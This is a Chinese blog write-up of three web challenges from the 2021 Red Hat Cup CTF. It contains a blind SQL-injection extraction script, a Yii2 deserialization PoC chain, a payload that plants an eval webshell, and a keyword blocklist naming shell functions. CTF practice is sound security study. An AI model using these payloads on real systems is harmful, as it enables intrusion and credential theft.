红帽杯2021_web_部分

最新推荐文章于 2022-12-05 21:24:37 发布
最新推荐文章于 2022-12-05 21:24:37 发布
阅读量1.2k 收藏 2
点赞数 4
分类专栏: 比赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45882317/article/details/116585020
版权

find_it

首页没发现东西,尝试robots.txt

发现 1ndexx.php

但无法访问 1ndexx.php

尝试继续找信息泄露,最后找到 .1ndexx.php.swp

<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

意思叫我们写入内容入hack.phpflag.php也会写进去

尝试绕过,失败,忽然想起这是个变量,而phpinfo()可以返回当前文件的所有变量

直接写<?=phpinfo(),访问hack.php,搜索flag即可

WebsiteManger

最新的网站测试器,作为非站长的你,能利用好它的功能吗?

进来一个登录,网站测试器,应该是要进后台

发现疑似注入点

<img src="image.php?id=1" width="200" height="200">

加单引号直接报错,SQL注入进后台无异

测试了下,布尔和延时都可以

然后过滤一些东西,如and,空格,反引号

直接布尔跑脚本

import requests

url = "http://eci-2zeg1tmyhxfbufu01znt.cloudeci1.ichunqiu.com:80/image.php?id="
mark = 30000

payload = "2=(ascii(substr(database(),{0},1))<{1})"#ctf
payload = "2=(ascii(substr((select%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()),{0},1))<{1})"#images,users
payload = "2=(ascii(substr((select%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='users'),{0},1))<{1})" #username,password
payload = "2=(ascii(substr((select%09group_concat(username,password)%09from%09users),{0},1))<{1})"            

headers={
    'Cookie':'UM_distinctid=178e9516af74c6-0c5738c00c76bf-3f356b-144000-178e9516af8445; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1618822948,1618823059,1619657823,1620521956; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1620542590; __jsluid_h=7c39815c08aa1e1162ff727572d92e27',
}
def getResult():
    flag=''
    global payload
    for i in range(1,50):
        min=32
        max=128
        while True:
            mid=min+(max-min)//2
            if min == mid :
                flag += chr(min)
                print(flag)  
                break
            r=requests.get(url+payload.format(i,mid),headers=headers)
            print(url+payload.format(i,mid))     
            if mark>len(r.text):
                max=mid
            else :
                min=mid
            if (min+3==max) and (min==32):
                return True  

getResult()

拿用户名密码进后台

提示输入网站URL测试,想到伪协议

被坑了,最后在 host=file:///flag读到flag,referer无用

framework

一道yii反序列化+disable_function

打开明显的yii2框架

这里猜测有源码,因为反序列化入口不知

直接 /www.zip发现源码,直接拷贝下来本地运行

在首页 web/index.php加一行 echo(Yii::getVersion());查看出版本为2.0.32

找到反序列化入口点

public function actionAbout($message = 'Hello')
{
$data = base64_decode($message);
unserialize($data);
}

直接打流传最广的poc链

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '5';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

?r=site%2Fabout&message=

发现有disable_function限制

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,mail,putenv,error_log,error_reporting,unset,unlink,return

一番尝试后发assert没被禁用,可以进行代码执行

改poc

$this->checkAccess = 'assert';
$this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[1]);?>");die();';

蚁剑连上去,直接用disable_functions的Apache CGI插件秒杀

flag在 /readflag

ScyLamb
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 14
    评论
专栏目录
2021-RedHat-CTF-WP【MISC】
afei001
05-18 364
目录 MISC 1.签到题:EBCDIC编码 1.1 方法1:010Editor工具转换 1.2 方法2:python转换 2.colorful code:RGB隐写+Piet 2.1 前期分析 2.2 RGB转图片 2.3 Piet解码 3.PicPic:你想成为CV大师嘛 3.1 前期分析 3.2 challenge1:傅里叶反变化原理 3.3 challenge2:傅里叶反变化原理 3.4 challenge3:傅里叶反变化原理 MISC 1.签到题:EBCDIC编.
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
[2021红帽杯]Web writeup
Anton__1的博客
05-10 1710
find_it 老套路扫一下目录 貌似只有君子协定有用,打开看看 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 打开1ndexx.php 发现打不开, 尝试一下是否有备份 /.1ndexx.php.swp 发现了一串代码: <?php $link = mysql_connect('localhost', 'root'); ?> <html> <hea
红帽杯2021web Find_it
qq_52671379的博客
06-14 320
Find_it 打开题目链接并没有任何收获 然后想想有无备份文件 最后通过dirsearch.py扫描发现robots.txt 发现存在1ndexx.php,直接访问并没有什么信息。 同样的猜测是否存在备份文件 常见的备份文件后扩展名有 .git .svn .swp .~ .bak .bash_history .svn 最后查看.swp备份文件得到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 915
小小记录一下
2021年红帽杯线上解题记录
shutdown -s -t
11-28 3139
签到 如题目名称提示,需要进行ebcdic编码,python原生不支持,安装额外库pip install ebcdic。python3解码脚本如下: import ebcdic with open('EBCDIC.txt', 'rb') as f: tmp = f.read() print(tmp.decode('cp1141')) 输出内容flagäwe1c0me_t0_redhat2021ü,调整一下flag{we1c0me_t0_redhat2021}。 find-it flag
Samba_红帽子搭建Samba服务器_samba_
10-01
在Redhat下搭建Samba服务器的具体过程步骤以及遇到问题的处理方案
红帽企5_oracle10g全程图解安装
10-15
红帽企业版5_oracle10g全程图解安装,非原创。
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
红帽(Red_Hat_Linux_9.0)安装方法
09-12
红帽(Red_Hat_Linux_9.0) 安装方法
2021红帽杯web部分复现
1ance's blog
05-18 402
目录Webfind_itframeworkWebsiteMangerMisc签到 Web find_it 根据题目信息查看robots.txt,发现1ndexx.php 打开也没有啥,于是扫扫目录,发现hack.php 但是好像也没有东西。 继续分析,找找有没有备份文件。 芜湖~发现有.1ndexx.php.swp 拿到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <t
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2360
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
2021红帽杯 framework
LYJ20010728的博客
06-22 309
2021红帽杯 framework考点思路Payload 考点 yii反序列化 思路 直接 /www.zip发现源码,直接拷贝下来本地运行 yii反序列化可以看看我之前的分析:文章链接 phpinfo中可以发现:system、eval之类的一些函数好像都没有效果,设置了disable_functions;assert能用、file_put_contents()也能用 Payload POC链 <?php namespace yii\rest{ class CreateAction{
红帽杯2021线下赛】pwn——oooohMsgHTTP
johnfic的博客
08-13 369
红帽杯2021】pwn——oooohMsgHTTP 参考网上大神写的wp进行复现,根据自己的理解写的一篇日记,一些知识理解错了的话请见谅 保护全开,程序需要构造如下http请求才能进行交互 ida上找到他的构造方法的地方,通过查看每个方法的代码(看了好久的代码,以及很多时间去调试),可以知道程序提供如下交互分别是: (1)ping 无实质效用 (2)welcome 泄露自身的函数的地址,减去在ida上的text段地址,可以暴露pie的地址,用于debug(其实也没什么用处) (3)login_user
红帽杯2021 决赛 opensns 复现
feng的博客
08-05 674
前言 因为某些事情,没有参加今年的红帽杯决赛,所以来复现一下决赛的Web题里面的opensns,学习一下思路。 复现 根据网上的文章进行复现学习。感觉能找到这个洞的师傅实在tql。 漏洞点位于Application/Weibo/Controller/ShareController.class.php的shareBox方法: public function shareBox(){ $query = urldecode(I('get.query','','text'));
[春秋云镜]CVE-2021-32682
niubi707的博客
12-05 4552
春秋云镜CVE-2021-32682elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1201
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9941
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
红帽配置web服务器
最新发布
12-27
以下是配置红帽企业版Linux上的Web服务器的步骤: 1. 安装Apache HTTP服务器: ```shell sudo yum install httpd ``` 2. 启动Apache服务: ```shell sudo systemctl start httpd ``` 3. 设置Apache服务开机自启动: ```shell sudo systemctl enable httpd ``` 4. 配置防火墙以允许HTTP流量: ```shell sudo firewall-cmd --permanent --add-service=http sudo firewall-cmd --reload ``` 5. 创建一个简单的测试页面: ```shell sudo echo "Hello, World!" > /var/www/html/index.html ``` 6. 在浏览器中访问服务器的IP地址或域名,应该能够看到 "Hello, World!" 的消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值